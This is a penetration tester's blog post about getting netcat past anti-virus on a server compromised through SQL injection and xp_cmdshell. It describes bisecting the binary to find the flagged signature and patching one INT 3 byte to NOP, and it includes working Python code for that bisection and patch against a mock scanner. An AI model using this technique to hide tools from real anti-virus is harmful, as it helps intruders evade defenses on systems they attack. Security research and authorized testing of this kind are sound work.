Bypassing anti-virus detection of Netcat
Ever wonder how to modify a hacking tool to evade anti-virus programs? I always understood how signature-based detection worked, but never bothered trying to bypass it during a pen-test. That's typically not something we have time to do on the fly. Besides, the only program we use that gets detected consistently is pwdump - and we got around that problem by modifying the source and recompiling it. But I recently got to use another technique that is interesting enough to share here.
It was an external pen-test: we were able to exploit SQL injection in a web application, and had the ability to run arbitrary commands on the database server through xp_cmdshell. The application was connecting to the MS SQL database with 'sa' privileges - bad move on their part. After running some test commands to verify that everything worked, we stood up a TFTP server on our pen-test build and sent a command for the compromised server to retrieve netcat so we could run a reverse shell.
We saw the file transfer succeed in our TFTP logs, but when we tried to execute netcat to connect to our listener, nothing happened. After spending an hour troubleshooting, we realized that nc.exe was never being written to the target server's file system after being uploaded. That's a tell-tale sign that anti-virus was eating the tool. I was a bit surprised - on our test builds neither Norton nor McAfee detect netcat, and I've never had it happen to me during other projects.
Our first instinct was to just recompile the netcat source after applying some changes, as we had done with pwdump, but we were having issues getting a development environment set up on our test system. So I set out to evade anti-virus by directly modifying the executable. First, I just changed some strings in the binary with a hex editor, but that didn't help. So I did some research and found a great writeup that details exactly how to change Netcat v1.11 to bypass Norton Anti-Virus: Taking Back Netcat. I wasn't sure whether the target server was running Norton, but it was worth a shot. (I guess I could have just run a 'dir' command to list the contents of "C:\Program Files" - oh well.)
The authors applied a sort of binary-search technique to isolate the code segment in netcat that was being detected by Norton: split the file, scan the pieces, keep the piece that still gets flagged, and repeat until the flagged region is small. They then used a debugger (the excellent OllyDbg) to disassemble that region and identify a portion that could be changed without disrupting the application's functionality. It turns out the code segment matched by the AV signature contains a sequence of software-debugging interrupts (INT 3, opcode 0xCC) that can be safely modified. Replacing one of those with a NOP (0x90) changes the binary enough to evade the signature, yet netcat still works perfectly. The single-byte edit matters: the file is the same size, no code is relocated, and nothing on the normal execution path is altered.
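The isolate-then-patch procedure above, written out as an added example (this is not code from the original post or from the Taking Back Netcat paper). It assumes a signature scanner that flags a file whenever a fixed byte string is present, which is the model the bisection relies on; the sample "binary" and the mock scanner are constructed here so the example runs offline, and the signature bytes are invented for illustration, not Norton's real netcat signature.

```python
"""Isolate an AV byte-signature by bisection, then patch an INT 3 inside it to NOP.

Constructed example: SAMPLE stands in for nc.exe and mock_av_detect stands in
for the AV scanner. Real AV engines match on more than fixed byte strings, and
a truncated PE may not be scanned the same way as a whole one, so on a real
target the oracle is "drop the chunk on the box and see if it survives".
"""

INT3, NOP = 0xCC, 0x90

# Constructed stand-in for the flagged code: push ebp; mov ebp,esp; int3 x4; xor eax,eax
SIGNATURE = bytes.fromhex("558bec" "cccccccc" "33c0")

# Constructed "binary": filler, the flagged region, more filler, ret. The filler
# ranges deliberately contain no 0xCC so the only INT 3s are in the signature.
PREFIX = b"MZ\x90\x00" + bytes(range(0x10, 0x30))          # 36 bytes
SUFFIX = bytes(range(0x40, 0x60)) + b"\xc3"                 # 33 bytes
SAMPLE = PREFIX + SIGNATURE + SUFFIX                        # signature at [36, 45)


def mock_av_detect(blob: bytes) -> bool:
    """Stand-in for the AV scanner: fires iff the fixed signature is present."""
    return SIGNATURE in blob


def locate_signature(blob: bytes, detect) -> tuple:
    """Return (start, end) of the smallest slice the scanner still flags.

    Two binary searches: the shortest flagged prefix fixes the end offset,
    then the latest flagged start within that prefix fixes the start offset.
    Both assume detection is monotone in the slice (true for a fixed byte
    string; a heuristic engine may not cooperate).
    """
    if not detect(blob):
        raise ValueError("sample is not detected; nothing to isolate")

    lo, hi = 0, len(blob)            # blob[:lo] is clean, blob[:hi] is flagged
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if detect(blob[:mid]):
            hi = mid
        else:
            lo = mid
    end = hi

    lo, hi = 0, end                  # blob[lo:end] is flagged, blob[hi:end] is clean
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if detect(blob[mid:end]):
            lo = mid
        else:
            hi = mid
    start = lo
    return start, end


def patch_int3_to_nop(blob: bytes, start: int, end: int, detect) -> tuple:
    """Try each INT 3 inside [start, end) as a single-byte NOP patch.

    Returns (patched_bytes, offset) for the first one-byte change that makes
    the scanner stop firing. Each attempt starts from the original so the
    resulting patch is exactly one byte, as in the netcat case.
    """
    for off in range(start, end):
        if blob[off] != INT3:
            continue
        patched = bytearray(blob)
        patched[off] = NOP
        if not detect(bytes(patched)):
            return bytes(patched), off
    raise RuntimeError("no single INT 3 -> NOP edit in the flagged range evades the scanner")


if __name__ == "__main__":
    s, e = locate_signature(SAMPLE, mock_av_detect)
    print(f"signature isolated to offsets [{s}, {e}): {SAMPLE[s:e].hex()}")
    patched, off = patch_int3_to_nop(SAMPLE, s, e, mock_av_detect)
    print(f"patched INT 3 at offset {off:#x}; still detected: {mock_av_detect(patched)}")
```

On a real engagement the scanner is the target's own AV: each bisection step is an upload and a check for whether the chunk still exists afterwards, so the number of round trips is roughly 2 * log2(file size). Whether the byte you patch is safe to change is a separate question answered in the debugger, not by the scanner.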
I repeated the steps in the whitepaper, and ended up with a patched version of nc.exe that we were able to successfully upload and run on the target server. It's a time-consuming but simple technique, and I plan on trying it out with some other tools when I get a chance. I'm sure this is nothing new to malware experts, but it was a fun little hack to pull off in the middle of a pen-test.
Labels: anti-virus, penetration testing, tools
